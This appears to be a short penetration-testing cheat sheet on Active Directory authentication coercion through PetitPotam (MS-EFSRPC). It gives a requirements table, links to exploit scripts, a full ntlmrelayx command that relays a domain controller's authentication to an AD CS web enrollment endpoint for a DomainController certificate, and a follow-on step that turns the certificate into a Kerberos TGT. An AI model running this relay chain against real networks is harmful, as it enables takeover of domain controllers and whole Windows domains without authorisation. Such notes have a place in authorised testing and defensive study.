Authentication Coercion
Multi-Method
Coercer will attempt 12 different methods to coerce authentication: (coercer)
PetitPotam (MS-EFSRPC)
Attack requirements
| Feature / Component | Required for PetitPotam | Required for Full Relay to DA via AD CS | 
|---|---|---|
| EFSRPC | ✅ Yes | ✅ Yes | 
| NTLM Enabled | ✅ Yes | ✅ Yes | 
| SMB/LDAP Signing Disabled | ✅ Yes (on relay target) | ✅ Yes (on certsrv or LDAP) | 
| AD CS Installed | ❌ No | ✅ Yes | 
| Vulnerable AD CS Template | ❌ No | ✅ Yes | 
| EPA / Channel Binding Off | ❌ No | ✅ Yes | 
Identify
shorthand
Exploit
https://github.com/topotam/PetitPotam https://raw.githubusercontent.com/S3cur3Th1sSh1t/Creds/master/PowershellScripts/Invoke-Petitpotam.ps1
Start ntlmrelayx
sudo ntlmrelayx.py -debug -smb2support --target http://CA01.domain.local/certsrv/certfnsh.asp --adcs --template DomainController
You should receive a base64 encoded certificate in ntlmrelayx output
Next, we can take this base64 certificate and use gettgtpkinit.py to request a Ticket-Granting-Ticket (TGT) for the domain controller.
https://github.com/dirkjanm/PKINITtools.git